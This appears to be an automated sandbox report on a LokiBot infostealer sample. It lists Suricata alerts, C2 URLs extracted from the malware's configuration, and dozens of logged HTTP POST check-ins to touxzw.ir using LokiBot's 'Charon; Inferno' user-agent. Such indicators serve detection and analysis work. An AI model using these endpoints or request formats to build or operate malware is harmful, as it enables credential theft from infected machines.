Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65211 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65211 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65156 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65156 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65211 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65211 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65196
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65197 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65193
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65207

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
